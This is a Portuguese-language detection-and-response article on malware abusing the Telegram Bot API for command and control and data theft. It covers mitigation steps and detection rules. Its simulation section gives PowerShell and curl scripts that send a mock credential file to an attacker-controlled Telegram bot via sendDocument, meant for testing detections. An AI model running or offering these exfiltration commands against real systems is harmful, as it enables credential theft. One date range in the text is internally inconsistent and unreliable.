Crônicas de Detecção & Resposta: Explorando Abuso no Telegram
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O artigo explica como vários atores de ameaça abusam da API do Bot do Telegram e dos canais em empresas para comando e controle, exfiltração de dados e monitoramento de vítimas. Famílias de malware, incluindo DeerStealer, Lumma Stealer, Raven Stealer e um construtor XWorm trojanizado, codificam bot tokens ou IDs de canal e chamam endpoints como /sendMessage e /sendDocument. Inclui consultas de detecção do Microsoft Defender e Sentinel focadas em linhas de comando de processo suspeitas e tráfego para api.telegram.org. A orientação principal é estabelecer um padrão de uso legítimo do Telegram e bloquear a API onde não é necessário.
Investigação
O SOC da NVISO relatou quatro tentativas de intrusão observadas entre outubro de 2025 e março de 2025, onde o Telegram foi usado em diferentes pontos do ciclo de ataque. O artigo destaca campanhas como o Lunar Spider monitorando vítimas via iscas de captcha falsas, DeerStealer enviando notificações ao operador via curl, Lumma Stealer puxando detalhes de C2 de canais do Telegram, Raven Stealer exfiltrando coleções arquivadas e um construtor XWorm se baseando na API do Bot tanto para exfiltração quanto para C2. Os analistas extraíram indicadores, incluindo linhas de comando de processo, destinos de rede e nomes de arquivos relevantes.
Mitigação
Estabeleça uma linha de base para o uso legítimo do Telegram, depois bloqueie o acesso de saída para api.telegram.org em ambientes onde não seja necessário. Fique atento a processos incomuns (por exemplo, curl, powershell, wscript) iniciando conexões com a API e investigue qualquer interação scriptada com a API do Bot. Ajuste as detecções para suprimir comportamentos esperados, como navegadores conhecidos iniciando telegram.exe, e priorize solicitações de long-polling ou estilo webhook originando de binários suspeitos ou hosts inesperados.
Resposta
Quando a atividade for detectada, isole o ponto final afetado, interrompa os processos suspeitos e preserve argumentos de linha de comando juntamente com DNS, proxy e telemetria de rede. Realize análises forenses mais profundas para identificar cargas úteis subsequentes associadas a campanhas como DeerStealer ou Raven Stealer. Rode quaisquer tokens de bot expostos, desabilite ou revogue canais do Telegram abusados e contenha a propagação bloqueando indicadores relacionados. Se o abuso for confirmado, escale o relatório através dos canais oficiais do Telegram e documente o incidente para prevenir recorrências.
Fluxo de Ataque
Detecções
Possível Abuso do Telegram Como Canal de Comando e Controle (via dns_query)
Visualizar
Modificação Suspeita de Exclusões do Defender (via cmdline)
Visualizar
Processo Suspeito Utiliza um URL na Linha de Comando (via cmdline)
Visualizar
IOCs (Emails) para detectar: As Crônicas de Detecção & Resposta: Explorando o Abuso do Telegram
Visualizar
Detectar Comunicação Não-Browser com a API do Telegram [Conexão de Rede do Windows]
Visualizar
Detecção de Uso Malicioso da API do Telegram [Criação de Processo do Windows]
Visualizar
Execução de Simulação
Pré-requisito: A Verificação Pré-voo da Telemetria & Linha de Base deve ter sido aprovada.
Fundamentação: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa do Ataque & Comandos:
Um adversário com um host Windows comprometido deseja exfiltrar um arquivo de credenciais coletado (creds.txt) para um bot do Telegram que eles controlam. Para evitar armazenar um binário personalizado, eles usam o nativocurl.exe(instalado através de recursos opcionais do Windows 10) para POSTar o arquivo parahttps://api.telegram.org/bot<ATTACKER_TOKEN>/sendDocument. O comando é executado a partir do PowerShell, garantindo que o evento de criação do processo registre uma linha de comando que contenha “api.telegram.org”. Como o processo écurl.exe, o filtro da regra (InitiatingProcessFileName: "telegram.exe") não suprime o alerta.# Variáveis (substitua por valores controlados pelo invasor) $BotToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11" $ChatID = "987654321" $FilePath = "C:Tempcreds.txt" # Garanta que o arquivo exista (dump de credencial simulado) Set-Content -Path $FilePath -Value "username: admin`npassword: P@ssw0rd!" # Execute a exfiltração via API do Bot do Telegram $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID" curl.exe -X POST -F "document=@$FilePath" $Url -
Script de Teste de Regressão: O script abaixo reproduz os passos exatos, adequado para execuções BAS automatizadas.
#-------------------------------------------- # Teste de Regressão – Exfiltração da API do Telegram #-------------------------------------------- param( [string]$BotToken = "REPLACE_WITH_TOKEN", [string]$ChatID = "REPLACE_WITH_CHATID", [string]$TmpDir = "$env:TEMPTelegramBAS" ) # Criar espaço de trabalho temporário New-Item -ItemType Directory -Path $TmpDir -Force | Out-Null # Arquivo de credencial simulado $CredFile = Join-Path $TmpDir "creds.txt" "username: admin`npassword: P@ssw0rd!" | Set-Content -Path $CredFile # Construir URL da API $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID" # Invocar exfiltração Write-Host "[*] Exfiltrando $CredFile para o Telegram..." curl.exe -X POST -F "document=@$CredFile" $Url # Indicador de sucesso simples (não verifica entrega) if ($LASTEXITCODE -eq 0) { Write-Host "[+] Comando de exfiltração executado." } else { Write-Error "[-] Falha na exfiltração." } -
Comandos de Limpeza: Remova o arquivo temporário e o diretório; opcionalmente encerre quaisquer
curl.exeprocessos remanescentes.# Limpar artefatos temporários Stop-Process -Name "curl" -ErrorAction SilentlyContinue Remove-Item -Path $TmpDir -Recurse -Force Write-Host "[*] Limpeza completa."